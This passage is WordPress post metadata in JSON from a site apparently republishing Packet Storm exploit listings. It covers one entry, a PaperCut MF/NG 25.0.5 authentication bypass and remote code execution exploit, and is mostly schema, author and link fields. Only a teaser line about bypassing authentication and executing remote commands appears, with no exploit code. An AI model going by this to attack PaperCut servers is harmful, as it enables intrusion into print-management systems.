bypass authentication and execute remote commands on the target...","og_url":"https:\/\/zero.redgem.net\/?p=41165","og_site_name":"zero redgem","article_published_time":"2026-02-17T12:46:09+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"9 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41165#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41165"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739","datePublished":"2026-02-17T12:46:09+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41165"},"wordCount":1740,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41165#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41165","url":"https:\/\/zero.redgem.net\/?p=41165","name":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-17T12:46:09+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41165#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41165"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41165#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 PaperCut MF\/NG 25.0.5 Authentication Bypass \/ Remote Code Execution_PACKETSTORM:215739"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41165","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41165"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41165\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41165"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41165"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41165"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}